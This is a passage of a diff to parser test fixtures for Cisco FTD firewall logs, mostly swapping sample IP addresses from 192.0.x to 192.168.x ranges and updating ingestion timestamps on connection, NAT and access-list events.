Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1016,8 +1016,8 @@ }, "destination": { "port": 10879, - "address": "192.0.0.130", - "ip": "192.0.0.130" + "address": "192.168.0.130", + "ip": "192.168.0.130" }, "source": { "port": 4954, @@ -1053,13 +1053,13 @@ "related": { "ip": [ "192.168.3.42", - "192.0.0.130" + "192.168.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994117184Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879", + "ingested": "2021-12-09T13:33:04.305721600Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1092,8 +1092,8 @@ }, "source": { "port": 80, - "address": "192.0.0.17", - "ip": "192.0.0.17" + "address": "192.168.0.17", + "ip": "192.168.0.17" }, "tags": [ "preserve_original_event" 
@@ -1124,15 +1124,15 @@ }, "related": { "ip": [ - "192.0.0.17", + "192.168.0.17", "192.168.3.42", "10.0.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994119011Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", + "ingested": "2021-12-09T13:33:04.305727Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1148,7 +1148,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "10.0.0.130", - "mapped_source_ip": "192.0.0.17", + "mapped_source_ip": "192.168.0.17", "connection_id": "89743277", "source_interface": "outside", "mapped_destination_port": 10879 @@ -1166,8 +1166,8 @@ }, "source": { "port": 12981, - "address": "192.0.0.66", - "ip": "192.0.0.66" + "address": "192.168.0.66", + "ip": "192.168.0.66" }, "tags": [ "preserve_original_event" @@ -1189,14 +1189,14 @@ }, "related": { "ip": [ - "192.0.0.66", + "192.168.0.66", "10.1.2.60" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994120971Z", - "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query", + "ingested": "2021-12-09T13:33:04.305732600Z", + "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -1219,8 +1219,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2006, 
@@ -1256,13 +1256,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994122823Z", - "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305737900Z", + "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1289,8 +1289,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49734, @@ -1326,13 +1326,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994124613Z", - "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305743300Z", + "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1359,8 +1359,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49735, 
@@ -1396,13 +1396,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994126416Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305748800Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1429,8 +1429,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49736, @@ -1466,13 +1466,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994128200Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305754300Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1499,8 +1499,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49737, 
@@ -1536,13 +1536,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994130050Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305759600Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1569,8 +1569,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49738, @@ -1606,13 +1606,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994131861Z", - "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305765Z", + "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1639,8 +1639,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49746, 
@@ -1676,13 +1676,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994133818Z", - "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305770500Z", + "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1709,8 +1709,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2007, @@ -1746,13 +1746,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994135627Z", - "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305776Z", + "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994137426Z", + "ingested": "2021-12-09T13:33:04.305781400Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1849,8 +1849,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2008, @@ -1886,13 +1886,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994139240Z", - "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305786800Z", + "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1924,8 +1924,8 @@ }, "source": { "port": 137, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -1951,14 +1951,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.2.42" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994141032Z", - "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside", + "ingested": "2021-12-09T13:33:04.305792Z", + "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", "action": "firewall-rule", @@ -1988,8 +1988,8 @@ }, "source": { "port": 12981, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" 
@@ -2011,14 +2011,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.5.60" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994142817Z", - "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query", + "ingested": "2021-12-09T13:33:04.305797400Z", + "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -2041,8 +2041,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2009, @@ -2078,13 +2078,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994144637Z", - "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305802800Z", + "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2111,8 +2111,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49776, 
@@ -2148,13 +2148,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994146438Z", - "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305808200Z", + "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2181,8 +2181,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2010, @@ -2218,13 +2218,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994148228Z", - "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305813500Z", + "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2251,8 +2251,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2011, 
@@ -2288,13 +2288,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994150022Z", - "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305818800Z", + "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2321,8 +2321,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2012, @@ -2358,13 +2358,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994151808Z", - "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305824200Z", + "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2396,8 +2396,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" 
@@ -2427,14 +2427,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994153758Z", - "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:33:04.305829800Z", + "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2466,8 +2466,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2497,14 +2497,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994157201Z", - "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:33:04.305835200Z", + "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2531,8 +2531,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49840, 
@@ -2568,13 +2568,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994159038Z", - "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305840600Z", + "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2601,8 +2601,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2013, @@ -2638,13 +2638,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994160875Z", - "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305847900Z", + "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2671,8 +2671,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.99", - "ip": "192.0.0.99" + "address": "192.168.0.99", + "ip": "192.168.0.99" }, "source": { "port": 2241, 
@@ -2708,13 +2708,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.99" + "192.168.0.99" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994162672Z", - "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305853500Z", + "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2792,7 +2792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994164482Z", + "ingested": "2021-12-09T13:33:04.305858800Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2822,8 +2822,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2863,7 +2863,7 @@ ], "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -2871,8 +2871,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994166278Z", - "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:33:04.305864200Z", + "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", 
@@ -2899,8 +2899,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2940,7 +2940,7 @@ ], "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -2948,8 +2948,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994168077Z", - "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:33:04.305869500Z", + "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2981,8 +2981,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3018,7 +3018,7 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "host": { @@ -3026,8 +3026,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994169878Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:33:04.305874900Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -3043,7 +3043,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3061,8 +3061,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3098,7 +3098,7 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "host": { @@ -3106,8 +3106,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994171698Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:33:04.305880300Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3123,7 +3123,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3141,8 +3141,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3177,7 +3177,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, 
@@ -3188,8 +3188,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:48.994173517Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "ingested": "2021-12-09T13:33:04.305885600Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:01:31.000Z", @@ -3222,8 +3222,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3258,7 +3258,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3269,8 +3269,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:48.994175314Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:33:04.305890900Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3303,8 +3303,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3339,7 +3339,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, 
